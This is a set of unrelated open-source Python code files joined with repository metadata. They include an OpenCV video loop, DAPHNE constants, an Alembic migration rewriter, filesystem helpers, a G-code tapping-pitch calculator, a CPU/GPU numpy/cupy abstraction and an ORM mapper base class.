                        # drawn above -- original nesting was ambiguous; confirm
                        # whether they belong here or one level up.
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 250, 0), 5)
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 250), 3)
                    print(dx)
                    pass
                else:
                    cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (200, 0, 0), 5)
                    totalTime[i] = 0
                    # The person is moving
            else:
                # This is the first frame
                cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (200, 0, 0), 3)
                pass
            i = i+1
        # Update the list of previous centroids
        if i2 > 0:
            print("i2: ", i2)
        else:
            prevTime = totalTime
        prev_centroids = centroids
        i2 += 1
    cv2.imshow('frame', frame)
    cv2.waitKey(25)
    ret, frame = cap.read()
cap.release()
cv2.destroyAllWindows() | PeterGQ/SuspicionDetector | main.py | main.py | py | 4,791 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tracker.Tracker",
"line_... |
32698917361 | from __future__ import annotations
import os
from typing import Union, TYPE_CHECKING
if TYPE_CHECKING:
from api.python.script_building.dag import DAGNode
from api.python.operator.nodes.matrix import Matrix
from api.python.operator.nodes.frame import Frame
from api.python.operator.nodes.scalar import Scalar
VALID_INPUT_TYPES = Union['DAGNode', str, int, float, bool]
# These are the operator symbols used in DaphneDSL (not in Python).
BINARY_OPERATIONS = ['+', '-', '/', '*', '^', '%', '<', '<=', '>', '>=', '==', '!=', '@', '&&', '||']
VALID_ARITHMETIC_TYPES = Union['DAGNode', int, float]
VALID_COMPUTED_TYPES = Union['Matrix', 'Frame', 'Scalar']
PYTHON_PATH = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
TMP_PATH = os.path.join(PYTHON_PATH, "tmp")
os.makedirs(TMP_PATH, exist_ok=True)
PROTOTYPE_PATH = os.path.dirname(os.path.dirname(os.path.dirname(PYTHON_PATH)))
# DAPHNE value type codes.
# The values need to be updated according to the value type codes in ValueTypeCode.h as this is a 1:1 copy.
SI8 = 0
SI32 = 1
SI64 = 2
UI8 = 3
UI32 = 4
UI64 = 5
F32 = 6
F64 = 7 | daphne-eu/daphne | src/api/python/utils/consts.py | consts.py | py | 1,109 | python | en | code | 51 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"lin... |
12211586840 | import fileinput
from collections import Counter
from operator import mul, ne
from itertools import product
lines = list(map(lambda e: e.strip(), fileinput.input()))
counts = map(Counter, lines)
values = map(lambda e: set(e.values()), counts)
has_2_3 = map(lambda e: (2 in e, 3 in e), values)
sum_2_3 = map(sum, zip(*has_2_3))
print(mul(*sum_2_3))
for a, b in product(lines, lines):
if sum(map(lambda e: ne(*e), zip(a, b))) == 1:
same = map(lambda e: False if ne(*e) else e[0], zip(a, b))
common = ''.join(filter(None, same))
print(common)
break
| whg/aoc2018 | day2.py | day2.py | py | 585 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fileinput.input",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 8,
"usage_type": "argument"
},
{
"api_name": "operator.mul",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.product"... |
15731069765 | from __future__ import annotations
from typing import Any
from typing import Callable
from typing import Iterator
from typing import List
from typing import Optional
from typing import Type
from typing import TYPE_CHECKING
from typing import Union
from .. import util
from ..operations import ops
if TYPE_CHECKING:
from ..operations.ops import AddColumnOp
from ..operations.ops import AlterColumnOp
from ..operations.ops import CreateTableOp
from ..operations.ops import MigrateOperation
from ..operations.ops import MigrationScript
from ..operations.ops import ModifyTableOps
from ..operations.ops import OpContainer
from ..runtime.environment import _GetRevArg
from ..runtime.migration import MigrationContext
class Rewriter:
"""A helper object that allows easy 'rewriting' of ops streams.
The :class:`.Rewriter` object is intended to be passed along
to the
:paramref:`.EnvironmentContext.configure.process_revision_directives`
parameter in an ``env.py`` script. Once constructed, any number
of "rewrites" functions can be associated with it, which will be given
the opportunity to modify the structure without having to have explicit
knowledge of the overall structure.
The function is passed the :class:`.MigrationContext` object and
``revision`` tuple that are passed to the :paramref:`.Environment
Context.configure.process_revision_directives` function normally,
and the third argument is an individual directive of the type
noted in the decorator. The function has the choice of returning
a single op directive, which normally can be the directive that
was actually passed, or a new directive to replace it, or a list
of zero or more directives to replace it.
.. seealso::
:ref:`autogen_rewriter` - usage example
"""
_traverse = util.Dispatcher()
_chained: Optional[Rewriter] = None
def __init__(self) -> None:
self.dispatch = util.Dispatcher()
def chain(self, other: Rewriter) -> Rewriter:
"""Produce a "chain" of this :class:`.Rewriter` to another.
This allows two rewriters to operate serially on a stream,
e.g.::
writer1 = autogenerate.Rewriter()
writer2 = autogenerate.Rewriter()
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
@writer2.rewrites(ops.AddColumnOp)
def add_column_idx(context, revision, op):
idx_op = ops.CreateIndexOp(
"ixc", op.table_name, [op.column.name]
)
return [op, idx_op]
writer = writer1.chain(writer2)
:param other: a :class:`.Rewriter` instance
:return: a new :class:`.Rewriter` that will run the operations
of this writer, then the "other" writer, in succession.
"""
wr = self.__class__.__new__(self.__class__)
wr.__dict__.update(self.__dict__)
wr._chained = other
return wr
def rewrites(
self,
operator: Union[
Type[AddColumnOp],
Type[MigrateOperation],
Type[AlterColumnOp],
Type[CreateTableOp],
Type[ModifyTableOps],
],
) -> Callable:
"""Register a function as rewriter for a given type.
The function should receive three arguments, which are
the :class:`.MigrationContext`, a ``revision`` tuple, and
an op directive of the type indicated. E.g.::
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
"""
return self.dispatch.dispatch_for(operator)
def _rewrite(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrateOperation,
) -> Iterator[MigrateOperation]:
try:
_rewriter = self.dispatch.dispatch(directive)
except ValueError:
_rewriter = None
yield directive
else:
if self in directive._mutations:
yield directive
else:
for r_directive in util.to_list(
_rewriter(context, revision, directive), []
):
r_directive._mutations = r_directive._mutations.union(
[self]
)
yield r_directive
def __call__(
self,
context: MigrationContext,
revision: _GetRevArg,
directives: List[MigrationScript],
) -> None:
self.process_revision_directives(context, revision, directives)
if self._chained:
self._chained(context, revision, directives)
@_traverse.dispatch_for(ops.MigrationScript)
def _traverse_script(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrationScript,
) -> None:
upgrade_ops_list = []
for upgrade_ops in directive.upgrade_ops_list:
ret = self._traverse_for(context, revision, upgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for UpgradeOps traverse"
)
upgrade_ops_list.append(ret[0])
directive.upgrade_ops = upgrade_ops_list
downgrade_ops_list = []
for downgrade_ops in directive.downgrade_ops_list:
ret = self._traverse_for(context, revision, downgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for DowngradeOps traverse"
)
downgrade_ops_list.append(ret[0])
directive.downgrade_ops = downgrade_ops_list
@_traverse.dispatch_for(ops.OpContainer)
def _traverse_op_container(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: OpContainer,
) -> None:
self._traverse_list(context, revision, directive.ops)
@_traverse.dispatch_for(ops.MigrateOperation)
def _traverse_any_directive(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrateOperation,
) -> None:
pass
def _traverse_for(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrateOperation,
) -> Any:
directives = list(self._rewrite(context, revision, directive))
for directive in directives:
traverser = self._traverse.dispatch(directive)
traverser(self, context, revision, directive)
return directives
def _traverse_list(
self,
context: MigrationContext,
revision: _GetRevArg,
directives: Any,
) -> None:
dest = []
for directive in directives:
dest.extend(self._traverse_for(context, revision, directive))
directives[:] = dest
def process_revision_directives(
self,
context: MigrationContext,
revision: _GetRevArg,
directives: List[MigrationScript],
) -> None:
self._traverse_list(context, revision, directives)
| sqlalchemy/alembic | alembic/autogenerate/rewriter.py | rewriter.py | py | 7,384 | python | en | code | 2,219 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 97,
"usage_type": "name"
},
{
"api_name": "typing.Type",
"... |
24339607859 | from logging import Logger
from pathlib import Path
import shutil
class IsNotAFileError(OSError):
"""Exception raised if operation only works on files."""
class IsNotADirectoryError(OSError):
"""Exception raised if operation only works on directories."""
class NonEmptyDirectoryError(OSError):
"""Exception raised if operation only works on empty directories."""
def path_with_suffix(path: Path, suffix: str):
"""Adds a suffix to a path if necessary."""
if suffix and not path.suffix == suffix:
path = path.with_suffix(suffix)
return path
def check_remove_filepath(path: Path, log: Logger, force: bool):
"""Checks the path does not point to a file, if it does will raise an error or remove it."""
path.parent.mkdir(parents=True, exist_ok=True)
if path.exists():
if not path.is_file():
log.error("%s exists and is not a file, aborting", path)
raise IsNotAFileError
if not force:
log.error("%s already exists, aborting (use -f/--force to overwrite)", path)
raise FileExistsError
log.warn("%s already exists, overwritten", path)
path.unlink()
def check_exists_filepath(path: Path, log: Logger):
"""Checks the path points to a file, if it doesn't will raise an error."""
if not path.exists():
log.error("%s already exists, aborting", path)
raise FileNotFoundError
def check_empty_directory(path: Path, log: Logger, force: bool, ignore: bool):
"""Checks the path does not point to a non-empty directory, if it does will raise an error or
empty it."""
path.parent.mkdir(parents=True, exist_ok=True)
if path.exists():
if not path.is_dir():
log.error("%s exists and is not a directory, aborting", path)
raise IsNotADirectoryError
if not (force or ignore):
log.error(
"%s already exists, aborting (use -f/--force to empty or -i/--ignore to ignore)",
path,
)
raise NonEmptyDirectoryError
if ignore:
log.warn("%s already exists and is non-empty, ignoring anyway", path)
return
log.warn(
"%s already exists and is non-empty, removing all files and sub-directories",
path,
)
shutil.rmtree(path.as_posix())
path.mkdir()
| src-d/ml-mining | sourced/ml/mining/utils/fs.py | fs.py | py | 2,380 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "logging.Logger",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_num... |
5799651728 | import vqa_gradients
import numpy as np
from scipy.linalg import expm
from scipy.stats import unitary_group
from scipy.misc import derivative
import functools as ft
tp = lambda a,b: np.tensordot(a,b,axes=0)
n_qubits = 3
H = 1/np.sqrt(2) * np.array([[1,1],[1,-1]])
X = np.array([[0,1],[1,0]])
M = ft.reduce(tp, np.repeat(H, n_qubits))
Psi = np.zeros((2**n_qubits,1)); Psi[0] = 1
G = np.diag(np.random.choice([1,2,3,4,5,6,7,8,9,10], 2**n_qubits))
W = vqa_gradients.complete_graph(2**n_qubits)/2**n_qubits
#W = np.diag(np.random.choice([1,2,3,4,5,6,7,8,9,10], 2**n_qubits))
R = vqa_gradients.find_R_from_qualities(np.linalg.eigvals(W))
rnd1 = unitary_group.rvs(2**n_qubits)
rnd2 = unitary_group.rvs(2**n_qubits)
def E(param):
U = ft.reduce(np.matmul,
[rnd2,
expm(-1j*param*W),
rnd1,
Psi])
U_dagger = U.conj().T
return ft.reduce(np.matmul, [U_dagger,G,U])
E = np.vectorize(E)
x = np.array([(2*np.pi*i)/(2*R+1) for i in range(-R,R+1)])
y = E(x)
s = vqa_gradients.Series(x,y)
s.plot(function=E)
rnd = np.random.random()*6-3
print(s.gradient(rnd))
print(derivative(E,rnd,dx=1e-6)[0,0])
| Mark-D-W/vqa_gradients | tests/test_Series.py | test_Series.py | py | 1,176 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.tensordot",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number"... |
30333853221 | import cv2
import numpy as np
import matplotlib.pyplot as plt
# H entre 0 e 33 (cor de pele)
# S entre 58 e 255 (saturação S baixo = branco)
# V entre 30 e 255 (V = 0 preto)
min_HSV = np.array([0, 58, 30], dtype="uint8")
# for better results, use skin-detector-YCrCb colorspace
max_HSV = np.array([33, 255, 255], dtype="uint8")
# takes your webcam input
vid = cv2.VideoCapture(0)
while(True):
ret, frame = vid.read()
imageHSV = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
roiSkin = cv2.inRange(imageHSV, min_HSV, max_HSV)
skin = cv2.bitwise_and(frame, frame, mask=roiSkin)
cv2.imshow('segmentado', skin)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
vid.release()
cv2.destroyAllWindows()
| Vicinius/digital-image-processing | pratica05/skin-detector-hsv.py | skin-detector-hsv.py | py | 721 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_numbe... |
71929274345 | from model import Todo
import motor.motor_asyncio
client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://root:example@localhost:27017/TodoList?authSource=admin')
database = client.TodoList
collection = database.todo
async def fetchOneTodo(title):
document = await collection.find_one({"title":title})
return document
async def fetchAllTodos():
todos = []
cursor = collection.find({})
async for document in cursor:
todos.append(Todo(**document))
return todos
async def createTodo(todo):
document = todo
result = await collection.insert_one(document)
return result
async def updateTodo(title,desc):
await collection.update_one({"title":title}, {"$set":{
"description":desc}})
document = await collection.find_one({"title":title})
return document
async def removeTodo(title):
await collection.delete_one({"title":title})
return True | coronel08/farm-stack-todo | backend/database.py | database.py | py | 912 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "motor.motor_asyncio.motor_asyncio.AsyncIOMotorClient",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "motor.motor_asyncio.motor_asyncio",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "motor.motor_asyncio",
"line_number": 4,
"usage_... |
31706326025 | import argparse
import torch
import os
from torch.utils.data import DataLoader
from dataset.dataset import Crowd
from model.model import Count
import numpy as np
def parse_arg():
parser = argparse.ArgumentParser()
parser.add_argument('--downsample-ratio', default=8, type=int,
help='the downsample ratio of the model')
parser.add_argument('--data-dir', default='QNRF/val',
help='the directory of the data')
parser.add_argument('--pretrained', default='pretrained/pcpvt_large.pth',
help='the path to the pretrained model')
parser.add_argument('--model-path', default='history/lr_1e-4_gamma_2_15/best_model.pth',
help='the path to the model')
parser.add_argument('--drop', type=float, default=0.0, metavar='PCT',
help='Dropout rate (default: 0.)')
parser.add_argument('--drop-path', type=float, default=0.45, metavar='PCT',
help='Drop path rate (default: 0.1)')
parser.add_argument('--device', default='0',
help="assign device")
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_arg()
torch.backends.cudnn.benchmark = True
os.environ['CUDA_VISIBLE_DEVICES'] = args.device.strip()
dataset = Crowd(args.data_dir, 512, args.downsample_ratio, method='val')
dataloader = DataLoader(dataset, 1, shuffle=False, pin_memory=False)
model = Count(args)
device = torch.device('cuda')
model.to(device)
model.load_state_dict(torch.load(args.model_path, device))
model.eval()
res = []
step = 0
for im, gt, size in dataloader:
im = im.to(device)
with torch.set_grad_enabled(False):
result, _, _, _, _, _ = model(im)
res1 = gt.item() - torch.sum(result).item()
res.append(res1)
print('{}/{}: GT:{}, predict:{:.2f}, diff:{:.2f}'.format(step, len(dataset), gt.item(), torch.sum(result).item(),
res1), size[0])
step = step + 1
print('MAE: {:.2f}, MSE:{:.2f}'.format(np.mean(np.abs(res)), np.sqrt(np.mean(np.square(res)))))
| cha15yq/CUT | test.py | test.py | py | 2,238 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.backends",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "dataset.d... |
23410785734 | # -*- coding: utf-8 -*-
"""
简单的两步任务, 串行.
"""
from datetime import datetime
from airflow.decorators import dag, task
dag_id = "dag2"
@dag(
dag_id=dag_id,
start_date=datetime(2021, 1, 1),
schedule="@once",
catchup=False,
)
def dag2():
"""
这个例子中我们有两个 Task, 先运行 Task 1, 再运行 Task 2. 如果 Task 1 不成功, 则不运行 Task 2.
我们的两个 Task 的任务都是生成一个随机数, 然后写入到 S3 中. 不过 Task 1 有 50% 的概率会失败.
你可以看到如果 Task 1 失败了, 则 Task 2 不会被执行.
"""
task1_id = "task1"
task2_id = "task2"
@task(
task_id=task1_id,
)
def task1():
import json
import random
from datetime import datetime
import boto3
print("Start task1")
# 有 50% 的概率失败
if random.randint(1, 100) <= 50:
raise Exception("Randomly failed")
aws_account_id = boto3.client("sts").get_caller_identity()["Account"]
aws_region = "us-east-1"
value = random.randint(1, 100)
print(f"Generated value is {value}")
data = {
"value": value,
"datetime": datetime.now().isoformat(),
}
boto3.client("s3").put_object(
Bucket=f"{aws_account_id}-{aws_region}-data",
Key=f"projects/mwaa-poc/{dag_id}/{task1_id}.output.json",
Body=json.dumps(data),
ContentType="application/json",
)
print("End task1")
return "Returned by task 1"
@task(
task_id=task2_id,
)
def task2():
import json
import random
from datetime import datetime
import boto3
print("Start task2")
aws_account_id = boto3.client("sts").get_caller_identity()["Account"]
aws_region = "us-east-1"
value = random.randint(1, 100)
print(f"Generated value is {value}")
data = {
"value": value,
"datetime": datetime.now().isoformat(),
}
boto3.client("s3").put_object(
Bucket=f"{aws_account_id}-{aws_region}-data",
Key=f"projects/mwaa-poc/{dag_id}/{task2_id}.output.json",
Body=json.dumps(data),
ContentType="application/json",
)
print("End task2")
return "Returned by task 2"
# 这里调用了两个 task 函数, 就相当于告诉 Airflow 我要运行他们两. 默认情况下 Airflow
# 认为它们是并行, 没有依赖关系, 但是如果你用 >>, << 这样的符号连接他们, 就表示他们是
# 有依赖关系的.
# Ref: https://airflow.apache.org/docs/apache-airflow/stable/tutorial/fundamentals.html#setting-up-dependencies
run_task1 = task1()
run_task2 = task2()
run_task1 >> run_task2
run_dag2 = dag2()
| MacHu-GWU/Dev-Exp-Share | docs/source/Open-Source-Softwares/Amazon-Managed-Workflows-for-Apache-Airflow-MWAA/02-Common-Patterns/dags/dag2.py | dag2.py | py | 2,892 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "random.randint",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
... |
16559387946 | from rich import print
from rich.console import Console
from rich.table import Table
from decimal import *
import sys
# TODO: Load file by launching with arguments
# Pitch calculation for non feed/rev
# Ignore comments when finding G84
# Select the G-code source: either the hard-coded path (manualFile=True) or
# file paths passed on the command line (e.g. files dropped onto the script).
manualFile = False
filePath = "Sample Gcode/Solidworks/CGIP11719.nc"
if manualFile:
    with open(filePath, 'r') as file:
        lines = file.readlines()
else:
    # Fix: sys.argv[1:] never raises IndexError -- it is simply empty when no
    # arguments were given, which previously left `lines` undefined and made
    # the script crash later with a NameError.  Test explicitly instead.
    droppedFile = sys.argv[1:]
    if not droppedFile:
        print("No file selected")
        sys.exit(1)
    for p in droppedFile:
        filePath = p
        with open(p, 'r') as file:
            lines = file.readlines()
def readLine(line):
    """Split one raw G-code line into address words (e.g. 'G84', 'F0.05'),
    dropping any text inside parenthesised comments.

    A word starts at an address letter and is terminated by the next address
    letter, a space, or a newline.  A line without a trailing newline leaves
    its final word unflushed (same contract as the original tokenizer).
    """
    address_letters = ('G', 'M', 'T', 'S', 'F', 'X', 'Y', 'Z', 'H', 'D', 'N', 'R', 'P')
    words = []
    current = ""
    in_comment = False
    for ch in line:
        if ch == "(":
            in_comment = True
        elif ch == ")" and in_comment:
            in_comment = False
        elif ch in address_letters or ch in ("\n", " "):
            # An address letter or separator terminates the word in progress.
            if current not in ("", " "):
                words.append(current)
            current = ""
        # Accumulate anything outside comments (stray ')' chars are dropped).
        if not in_comment and ch != ")":
            current += ch
    return words
def readWords(words, values):
    """Fill any still-unset entries of *values* from a list of G-code words.

    Entries start out as False and are written at most once (except the G98
    flag), so scanning program lines backwards keeps the value closest to
    the G84 cycle.  Seeing a tool word (T) while feedPerRev is still unknown
    marks it "NO", which lets the caller's while-loop terminate.
    """
    for word in words:
        letter, number = word[0], word[1:]
        if letter == 'F' and values["feed"] == False:
            values["feed"] = float(number)
        elif letter == 'S' and values["rpm"] == False:
            values["rpm"] = int(number)
        elif letter == 'T':
            if values["tool"] == False:
                values["tool"] = int(number)
            if values["feedPerRev"] == False:
                values["feedPerRev"] = "NO"
        elif letter == 'G' and int(number) == 98:
            # A G98 word flags the cycle as feed-per-revolution mode
            # (as this script interprets it -- see calculatePitch).
            values["feedPerRev"] = True
    return values
tappingCycleIndex = [] # Store all G84 values to read related Gcode
# Record, for every line containing "G84", the index of the *next* line;
# the backwards scan below starts there and walks up through the cycle.
for lineIndex, line in enumerate(lines):
    if line.find("G84") != -1:
        tappingCycleIndex.append(lineIndex+1)

allValues = [] # Store information about each tapping cycle
for tappingCycle in tappingCycleIndex:
    # False marks a value as still unknown; scan upwards until all are set
    # (readWords flips feedPerRev to "NO" at the tool change, ending the loop).
    valueDict = {"tool":False, "rpm":False, "feed":False, "feedPerRev":False}
    lineToRead = tappingCycle
    while False in valueDict.values():
        words = readLine(lines[lineToRead])
        readWords(words, valueDict)
        lineToRead -= 1
    allValues.append(valueDict)

# Sort data
allValues = sorted(allValues, key= lambda i: i['tool'])
# Calculate pitches
def calculatePitch(tappingData):
    """Derive thread-pitch figures for one tapping cycle, in place.

    Adds "metricPitch" (mm per revolution) and "threadsPerInch" to
    *tappingData*.  When feedPerRev is True the F word is inches per
    revolution; otherwise F is inches per minute and must be divided by
    the spindle RPM to get the advance per revolution.
    """
    if tappingData["feedPerRev"] == True:
        tappingData["metricPitch"] = round(tappingData["feed"] * 25.4, 3)
        tappingData["threadsPerInch"] = round(1 / tappingData["feed"], 2)
    else:
        # Fix: pitch is feed/rpm (inches per rev) converted to mm.  The old
        # rpm/feed * 25.4 expression was TPI * 25.4, not a pitch at all.
        tappingData["metricPitch"] = round(tappingData["feed"] / tappingData["rpm"] * 25.4, 3)
        tappingData["threadsPerInch"] = round(tappingData["rpm"] / tappingData["feed"], 2)
# Derive pitch figures for every detected tapping cycle.
for value in allValues:
    calculatePitch(value)

# Print Results
print("File loaded:", filePath)
console = Console()
table = Table(show_header=True)
table.add_column("Tool #")
table.add_column("RPM")
table.add_column("Feed")
table.add_column("Metric Pitch")
table.add_column("Threads per Inch")
for tool in allValues:
    table.add_row(str(tool["tool"]),str(tool["rpm"]),str(tool["feed"]),str(tool["metricPitch"]),str(tool["threadsPerInch"]))
console.print(table)
# Presumably keeps the console window open when launched by drag-and-drop.
input("Press enter to continue...")
{
"api_name": "sys.argv",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "rich.print",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "rich.console.Console",
"line... |
26312475383 | import sys
from os import path
import numpy
import scipy
import cupy
import cupyx
import datetime
from dataclasses import dataclass
@dataclass
class ExecutionSetup:
    """Run-time configuration: device selection, float precision, data dir."""
    gpu: bool = False           # request GPU execution (used only if CUDA is present)
    precision: str = 'float32' if False else 'float64'  # noqa  # 'float32' or 'float64'
    data_folder: str = f".{path.sep}data{path.sep}"     # where .npy arrays live
    # Concrete dtype objects; overwritten by CPU_GPU_Abstractor.__setup_precision.
    precision_np = numpy.float64
    precision_cp = cupy.float64
class CPU_GPU_Abstractor:
    """Abstracts numpy/scipy (CPU) vs cupy/cupyx (GPU) behind self.xp / self.scipy.

    Also provides a simple console progress bar with an elapsed-time-based
    remaining-time estimate, and helpers to move arrays between host and device.
    """

    def __init__(self, exec_setup: ExecutionSetup):
        self.exec_setup = exec_setup
        self.__setup_numpy_and_scipy()
        self.__setup_precision()
        self.__pb_started = False  # progress bar has not started timing yet

    def __setup_precision(self):
        # Resolve the configured precision string into dtype objects for the
        # active backend (xp) and, explicitly, for numpy and cupy.
        if self.exec_setup.precision == 'float32':
            self.exec_setup.precision = self.xp.float32
            self.exec_setup.precision_np = numpy.float32
            self.exec_setup.precision_cp = cupy.float32
        elif self.exec_setup.precision == 'float64':
            self.exec_setup.precision = self.xp.float64
            self.exec_setup.precision_np = numpy.float64
            self.exec_setup.precision_cp = cupy.float64
        else:
            raise Exception("Invalid floating point precision specified")

    def __setup_numpy_and_scipy(self):
        # Use the GPU only when requested AND a CUDA device is actually
        # present; otherwise fall back to the CPU stack.
        if cupy.cuda.runtime.getDeviceCount() > 0 and self.exec_setup.gpu:
            self.xp = cupy
            self.scipy = cupyx.scipy
            self.gpu = True
            device = cupy.cuda.Device(0)
            print(f"GPU-Device ID: {device.id}")
            print(f"GPU-Compute Capability: {device.compute_capability}")
            print(f"GPU-Memory available: {device.mem_info[0]/1e6:.1f}/{device.mem_info[1]/1e6:.1f} MB")
        else:
            self.xp = numpy
            self.scipy = scipy
            self.gpu = False

    def _print_progress_bar(self, progress, max, progress_bar_length=40, title="Progress"):
        # Draw/redraw a one-line progress bar with percentage and an
        # "ERT" (estimated remaining time) column.
        # NOTE(review): `max` shadows the builtin; kept for compatibility.
        progress_ratio = progress/max
        if not self.__pb_started:
            # First call: remember the start time for the ETA extrapolation.
            self.__ts = datetime.datetime.now()
            self.__pb_started = True
        tc = datetime.datetime.now()
        # Remaining seconds extrapolated from elapsed time and completion ratio.
        tf = (1/progress_ratio -1)*(tc - self.__ts).total_seconds()
        title = f"\r{title}: {progress:5}/{max:5}: "
        success_rate = f" {progress_ratio*100:3.2f}%"
        remaining_time = f" ERT: {int(tf/60):02}:{int(tf%60):02}"
        number_of_progress_indicators = int(progress * progress_bar_length // (max))
        sys.stdout.write(title + "[" + number_of_progress_indicators*"#" + (progress_bar_length - number_of_progress_indicators)*"-" + "]" + success_rate + remaining_time)

    def _end_progress_bar(self):
        # Finish the bar's line and re-arm timing for the next bar.
        sys.stdout.write("\n")
        self.__pb_started = False

    def _get_array_from_disk_or_mem(self, A):
        # Accept either a file name inside data_folder or an in-memory array;
        # returns the array on the active backend.
        if type(A) == str and path.exists(self.exec_setup.data_folder + A):
            return self.xp.load(self.exec_setup.data_folder + A)
        elif type(A) == cupy.ndarray or type(A) == numpy.ndarray:
            if self.gpu:
                return cupy.asarray(A)
            else:
                return cupy.asnumpy(A)
        else:
            raise Exception("Array has invalid type. Needs to be either a path to an array or a cupy.ndarray or a numpy.ndarray")

    def asnumpy(self, a):
        """Move array to host"""
        return cupy.asnumpy(a)

    def ascupy(self, a):
        """Move array to device"""
        return cupy.asarray(a)
| chrasa/removal-of-imaging-artifacts-NN | cpu_gpu_abstraction.py | cpu_gpu_abstraction.py | py | 3,305 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.sep",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "numpy.float64",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "cupy.float64",
"line_... |
25937674832 | from core.base_classes.entity import BaseEntityProps
from core.value_objects import DateVO, ID
from abc import ABC, abstractmethod
from typing import Any, Generic, TypeVar, get_args
from infrastructure.database.base_classes.mongodb import OrmEntityBase
Entity = TypeVar('Entity', bound=BaseEntityProps)
OrmEntity = TypeVar('OrmEntity')
Props = TypeVar('Props')
class OrmMapperBase(ABC, Generic[Entity, OrmEntity]):
    """Maps between domain entities and MongoDB ORM entities.

    Subclasses supply the two concrete classes plus property-level
    conversion (to_domain_props / to_orm_props); this base handles the
    id / created_at / updated_at bookkeeping in both directions.
    """

    def __init__(self) -> None:
        super().__init__()

    @property
    @abstractmethod
    def entity_klass(self):
        """Domain entity class to instantiate (abstract)."""
        # return get_args(self.__orig_bases__[0])[0]
        raise NotImplementedError()

    @property
    @abstractmethod
    def orm_entity_klass(self):
        """ORM entity class to instantiate (abstract)."""
        # return get_args(self.__orig_bases__[0])[1]
        raise NotImplementedError()

    @abstractmethod
    def to_domain_props(self, orm_entity: OrmEntity) -> Any:
        """Convert ORM fields into the props consumed by the domain entity."""
        return

    @abstractmethod
    def to_orm_props(self, entity: Entity) -> OrmEntity:
        """Convert domain-entity state into ORM constructor kwargs."""
        return

    def to_domain_entity(self, orm_entity: OrmEntity) -> Entity:
        """Build a full domain entity (props + id + timestamps) from an ORM row."""
        props = self.to_domain_props(orm_entity)
        return self.assign_props_to_entity(props, orm_entity)

    def to_orm_entity(self, entity: Entity) -> OrmEntity:
        """Build an ORM entity, unwrapping the value objects explicitly."""
        props = self.to_orm_props(entity)
        return self.orm_entity_klass(**{
            **props,
            'id': entity.id.value,
            'created_at': entity.created_at.value,
            'updated_at': entity.updated_at.value
        })

    def assign_props_to_entity(
        self,
        entity_props: Any,
        orm_entity: OrmEntity
    ) -> Entity:
        """Wrap raw ORM id/timestamps in value objects and hydrate the entity."""
